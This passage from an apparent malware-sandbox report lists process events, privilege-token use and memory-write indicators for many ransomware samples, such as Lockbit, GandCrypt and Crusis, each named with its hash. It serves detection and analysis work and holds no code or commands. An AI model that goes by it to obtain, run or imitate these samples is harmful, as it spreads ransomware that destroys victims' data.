taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 1120 taskmgr.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exepid process 2156 Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exetaskmgr.exetaskmgr.exepowershell.exedw20.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exeHEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exevssvc.exeHEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exeWMIC.exedescription pid process Token: SeRestorePrivilege 4540 7zFM.exe Token: 35 4540 7zFM.exe Token: SeSecurityPrivilege 4540 7zFM.exe Token: SeDebugPrivilege 1704 taskmgr.exe Token: SeSystemProfilePrivilege 1704 taskmgr.exe Token: SeCreateGlobalPrivilege 1704 taskmgr.exe Token: SeDebugPrivilege 1120 taskmgr.exe Token: SeSystemProfilePrivilege 1120 taskmgr.exe Token: SeCreateGlobalPrivilege 1120 taskmgr.exe Token: 33 1704 taskmgr.exe Token: SeIncBasePriorityPrivilege 1704 taskmgr.exe Token: SeDebugPrivilege 4680 powershell.exe Token: SeRestorePrivilege 2832 dw20.exe Token: SeBackupPrivilege 2832 dw20.exe Token: SeBackupPrivilege 2832 dw20.exe Token: SeBackupPrivilege 2832 dw20.exe Token: SeBackupPrivilege 2832 dw20.exe Token: SeDebugPrivilege 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe Token: SeDebugPrivilege 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe Token: SeDebugPrivilege 1292 HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe Token: SeDebugPrivilege 3328 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe Token: SeTakeOwnershipPrivilege 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe Token: SeDebugPrivilege 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe Token: SeBackupPrivilege 2428 vssvc.exe Token: SeRestorePrivilege 2428 vssvc.exe Token: SeAuditPrivilege 2428 vssvc.exe Token: SeDebugPrivilege 1716 HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe Token: SeIncreaseQuotaPrivilege 8260 WMIC.exe Token: SeSecurityPrivilege 8260 WMIC.exe Token: SeTakeOwnershipPrivilege 8260 WMIC.exe Token: SeLoadDriverPrivilege 8260 WMIC.exe Token: SeSystemProfilePrivilege 8260 WMIC.exe Token: SeSystemtimePrivilege 8260 WMIC.exe Token: SeProfSingleProcessPrivilege 8260 WMIC.exe Token: SeIncBasePriorityPrivilege 8260 WMIC.exe Token: SeCreatePagefilePrivilege 8260 WMIC.exe Token: SeBackupPrivilege 8260 WMIC.exe Token: SeRestorePrivilege 8260 WMIC.exe Token: SeShutdownPrivilege 8260 WMIC.exe Token: SeDebugPrivilege 8260 WMIC.exe Token: SeSystemEnvironmentPrivilege 8260 WMIC.exe Token: SeRemoteShutdownPrivilege 8260 WMIC.exe Token: SeUndockPrivilege 8260 WMIC.exe Token: SeManageVolumePrivilege 8260 WMIC.exe Token: 33 8260 WMIC.exe Token: 34 8260 WMIC.exe Token: 35 8260 WMIC.exe Token: 36 8260 WMIC.exe Token: SeIncreaseQuotaPrivilege 8260 WMIC.exe Token: SeSecurityPrivilege 8260 WMIC.exe Token: SeTakeOwnershipPrivilege 8260 WMIC.exe Token: SeLoadDriverPrivilege 8260 WMIC.exe Token: SeSystemProfilePrivilege 8260 WMIC.exe Token: SeSystemtimePrivilege 8260 WMIC.exe Token: SeProfSingleProcessPrivilege 8260 WMIC.exe Token: SeIncBasePriorityPrivilege 8260 WMIC.exe Token: SeCreatePagefilePrivilege 8260 WMIC.exe Token: SeBackupPrivilege 8260 WMIC.exe Token: SeRestorePrivilege 8260 WMIC.exe Token: SeShutdownPrivilege 8260 WMIC.exe Token: SeDebugPrivilege 8260 WMIC.exe Token: SeSystemEnvironmentPrivilege 8260 WMIC.exe Token: SeRemoteShutdownPrivilege 8260 WMIC.exe Token: SeUndockPrivilege 8260 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zFM.exetaskmgr.exetaskmgr.exepid process 4540 7zFM.exe 4540 7zFM.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1704 taskmgr.exe 1120 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exetaskmgr.exepid process 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1704 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe -
Suspicious use of SetWindowsHookAW 64 IoCs
Processes:
Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exepid process 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
cmd.exepid process 4304 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
taskmgr.exepowershell.execmd.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exedescription pid process target process PID 1704 wrote to memory of 1120 1704 taskmgr.exe taskmgr.exe PID 1704 wrote to memory of 1120 1704 taskmgr.exe taskmgr.exe PID 4680 wrote to memory of 4304 4680 powershell.exe cmd.exe PID 4680 wrote to memory of 4304 4680 powershell.exe cmd.exe PID 4304 wrote to memory of 2164 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe PID 4304 wrote to memory of 2164 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe PID 4304 wrote to memory of 2164 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe PID 4304 wrote to memory of 3384 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 4304 wrote to memory of 3384 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 4304 wrote to memory of 3384 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 4304 wrote to memory of 1292 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe PID 4304 wrote to memory of 1292 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe PID 4304 wrote to memory of 1292 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe PID 4304 wrote to memory of 1716 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe PID 4304 wrote to memory of 1716 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe PID 4304 wrote to memory of 1716 4304 cmd.exe HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe PID 4304 wrote to memory of 2276 4304 cmd.exe HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe PID 4304 wrote to memory of 2276 4304 cmd.exe HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe PID 4304 wrote to memory of 2276 4304 cmd.exe HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe PID 4304 wrote to memory of 552 4304 cmd.exe HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe PID 4304 wrote to memory of 552 4304 cmd.exe HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe PID 4304 wrote to memory of 552 4304 cmd.exe HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe PID 4304 wrote to memory of 2936 4304 cmd.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe PID 4304 wrote to memory of 2936 4304 cmd.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe PID 4304 wrote to memory of 2936 4304 cmd.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe PID 2164 wrote to memory of 2832 2164 HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe dw20.exe PID 2164 wrote to memory of 2832 2164 HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe dw20.exe PID 2164 wrote to memory of 2832 2164 HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe dw20.exe PID 4304 wrote to memory of 4524 4304 cmd.exe HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe PID 4304 wrote to memory of 4524 4304 cmd.exe HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe PID 4304 wrote to memory of 4524 4304 cmd.exe HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe PID 4304 wrote to memory of 4520 4304 cmd.exe Trojan-Ransom.Win32.Blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exe PID 4304 wrote to memory of 4520 4304 cmd.exe Trojan-Ransom.Win32.Blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exe PID 4304 wrote to memory of 4520 4304 cmd.exe Trojan-Ransom.Win32.Blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exe PID 4304 wrote to memory of 3656 4304 cmd.exe Trojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exe PID 4304 wrote to memory of 3656 4304 cmd.exe Trojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exe PID 4304 wrote to memory of 3656 4304 cmd.exe Trojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exe PID 4304 wrote to memory of 2580 4304 cmd.exe Trojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exe PID 4304 wrote to memory of 2580 4304 cmd.exe Trojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exe PID 4304 wrote to memory of 2580 4304 cmd.exe Trojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exe PID 4304 wrote to memory of 5052 4304 cmd.exe Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe PID 4304 wrote to memory of 5052 4304 cmd.exe Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe PID 4304 wrote to memory of 5052 4304 cmd.exe Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe PID 4304 wrote to memory of 1468 4304 cmd.exe Trojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exe PID 4304 wrote to memory of 1468 4304 cmd.exe Trojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exe PID 4304 wrote to memory of 1468 4304 cmd.exe Trojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exe PID 3384 wrote to memory of 4836 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 4836 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 4836 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 2524 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 2524 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 2524 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 3328 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 3328 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 3328 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe 